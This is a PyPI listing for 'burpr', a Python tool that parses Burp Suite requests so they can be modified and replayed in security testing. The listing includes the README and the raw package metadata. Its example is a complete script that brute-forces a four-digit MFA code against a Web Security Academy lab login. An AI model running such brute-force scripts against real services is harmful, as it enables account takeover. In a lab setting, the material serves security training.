# What is it
A Burp Suite request parser, used for aid in assessing application security functionality.
# Why I wrote it
To use Burp Suite captured requests without relying on intruder.
# Installation
```
pip install burpr
```
# Usage
Use burpr.py module to parse the Burp Suite copied request. Then use the created object to extract headers and body.
Supports parsing requests as strings and as .txt files.
```python
import burpr
# Load from string
req = burpr.parse_string(req_string)
# Load from file
req = burpr.parse_file(req_file_path)
# clone the request
req_clone = burpr.clone(req)
# change protocol to http1.1
req_clone.set_protocol(burpr.protocols.HTTP1_1)
# change transport to http
req_clone.set_transport(burpr.transports.HTTP)
# modify the header
req_clone.set_header("Cookie", "session=modified_session_cookie")
# modify the parameter
req_clone.set_parameter("post-param", "AAABBBCCC")
# remove parameter
req_clone.remove_parameter("post-param")
# remove header
req_clone.remove_header("Cookie")
# adjust Content-Length for parameter change
burpr.prepare(req_clone)
client = httpx.Client(http2=True)
res = client.post(req.url, headers=req.headers, data=req.body)
```
# Examples
## Brute force broken MFA
```python
import burpr
import httpx
import itertools
burp_request = r"""POST /login2 HTTP/2
Host: xxxx.web-security-academy.net
Cookie: verify=carlos; session=xxxx
Content-Length: 13
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://xxxx.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxx.web-security-academy.net/login2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
mfa-code=4321
"""
def generate_pin_numbers():
return [''.join(list([str(digit) for digit in permutation]))
for permutation in itertools.product(list(range(0, 10)), repeat=4)]
def brute_force_broken_mfa():
# Parse request from string
req = burpr.parse_string(burp_request)
# Create http client and check the protocol used
client = httpx.Client(http2=req.is_http2)
for pin in generate_pin_numbers():
# Modify the mfa-code parameter
req.set_parameter("mfa-code", pin)
# Send the request
res = client.post(req.url, headers=req.headers, data=req.body)
print(res.status_code, pin)
if (res.status_code != 200):
break
brute_force_broken_mfa()
```
Raw data
{
"_id": null,
"home_page": "https://github.com/krystianbajno/burpr",
"name": "burpr",
"maintainer": "",
"docs_url": null,
"requires_python": "",
"maintainer_email": "",
"keywords": "burp suite burpsuite request parser",
"author": "Krystian Bajno",
"author_email": "krystian.bajno@gmail.com",
"download_url": "https://files.pythonhosted.org/packages/2e/97/02cc2787d4784f9f1eeae1954972202775a0fb8eb866f90b3c6ae4c1d7e1/burpr-0.0.4.tar.gz",
"platform": null,
"description": "# What is it\r\nA Burp Suite request parser, used for aid in assessing application security functionality.\r\n\r\n# Why I wrote it\r\nTo use Burp Suite captured requests without relying on intruder.\r\n\r\n# Installation\r\n```\r\npip install burpr\r\n```\r\n\r\n# Usage\r\nUse burpr.py module to parse the Burp Suite copied request. Then use the created object to extract headers and body.\r\n\r\nSupports parsing requests as strings and as .txt files.\r\n\r\n```python\r\nimport burpr\r\n\r\n# Load from string\r\nreq = burpr.parse_string(req_string)\r\n\r\n# Load from file\r\nreq = burpr.parse_file(req_file_path)\r\n\r\n# clone the request\r\nreq_clone = burpr.clone(req)\r\n\r\n# change protocol to http1.1\r\nreq_clone.set_protocol(burpr.protocols.HTTP1_1)\r\n\r\n# change transport to http\r\nreq_clone.set_transport(burpr.transports.HTTP)\r\n\r\n# modify the header\r\nreq_clone.set_header(\"Cookie\", \"session=modified_session_cookie\")\r\n\r\n# modify the parameter\r\nreq_clone.set_parameter(\"post-param\", \"AAABBBCCC\")\r\n\r\n# remove parameter\r\nreq_clone.remove_parameter(\"post-param\")\r\n\r\n# remove header\r\nreq_clone.remove_header(\"Cookie\")\r\n\r\n# adjust Content-Length for parameter change\r\nburpr.prepare(req_clone)\r\n\r\nclient = httpx.Client(http2=True)\r\nres = client.post(req.url, headers=req.headers, data=req.body)\r\n```\r\n\r\n# Examples\r\n## Brute force broken MFA\r\n```python\r\nimport burpr\r\nimport httpx\r\nimport itertools\r\n\r\nburp_request = r\"\"\"POST /login2 HTTP/2\r\nHost: xxxx.web-security-academy.net\r\nCookie: verify=carlos; session=xxxx\r\nContent-Length: 13\r\nCache-Control: max-age=0\r\nSec-Ch-Ua: \r\nSec-Ch-Ua-Mobile: ?0\r\nSec-Ch-Ua-Platform: \"\"\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: https://xxxx.web-security-academy.net\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nReferer: https://xxxx.web-security-academy.net/login2\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\nmfa-code=4321\r\n\"\"\"\r\n\r\ndef generate_pin_numbers():\r\n return [''.join(list([str(digit) for digit in permutation])) \r\n for permutation in itertools.product(list(range(0, 10)), repeat=4)]\r\n\r\ndef brute_force_broken_mfa():\r\n # Parse request from string\r\n req = burpr.parse_string(burp_request)\r\n\r\n # Create http client and check the protocol used\r\n client = httpx.Client(http2=req.is_http2)\r\n\r\n for pin in generate_pin_numbers():\r\n # Modify the mfa-code parameter\r\n req.set_parameter(\"mfa-code\", pin)\r\n\r\n # Send the request\r\n res = client.post(req.url, headers=req.headers, data=req.body)\r\n\r\n print(res.status_code, pin)\r\n \r\n if (res.status_code != 200):\r\n break\r\n\r\nbrute_force_broken_mfa()\r\n```\r\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "A Burp Suite request parser, used for aid in assessing application security functionality.",
"version": "0.0.4",
"project_urls": {
"Homepage": "https://github.com/krystianbajno/burpr"
},
"split_keywords": [
"burp",
"suite",
"burpsuite",
"request",
"parser"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "2e9702cc2787d4784f9f1eeae1954972202775a0fb8eb866f90b3c6ae4c1d7e1",
"md5": "69786ea7c4c7ebcc5f15180f407b125e",
"sha256": "d575d0050ce70f20d50420137aaad72faf2930e658ee2a134c5657bf9403a63c"
},
"downloads": -1,
"filename": "burpr-0.0.4.tar.gz",
"has_sig": false,
"md5_digest": "69786ea7c4c7ebcc5f15180f407b125e",
"packagetype": "sdist",
"python_version": "source",
"requires_python": null,
"size": 4717,
"upload_time": "2023-09-09T16:30:10",
"upload_time_iso_8601": "2023-09-09T16:30:10.182829Z",
"url": "https://files.pythonhosted.org/packages/2e/97/02cc2787d4784f9f1eeae1954972202775a0fb8eb866f90b3c6ae4c1d7e1/burpr-0.0.4.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-09-09 16:30:10",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "krystianbajno",
"github_project": "burpr",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [],
"lcname": "burpr"
}
JSON
